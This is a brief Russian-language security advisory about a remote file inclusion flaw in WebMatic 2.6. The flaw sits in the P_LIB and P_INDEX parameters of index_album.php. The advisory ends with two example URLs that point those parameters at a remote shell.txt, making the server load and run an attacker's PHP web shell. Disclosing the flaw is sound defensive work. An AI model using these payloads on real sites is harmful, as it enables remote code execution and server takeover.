Программа: WebMatic 2.6
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах «P_LIB» и «P_INDEX» сценарием index_album.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
[Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt
[Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt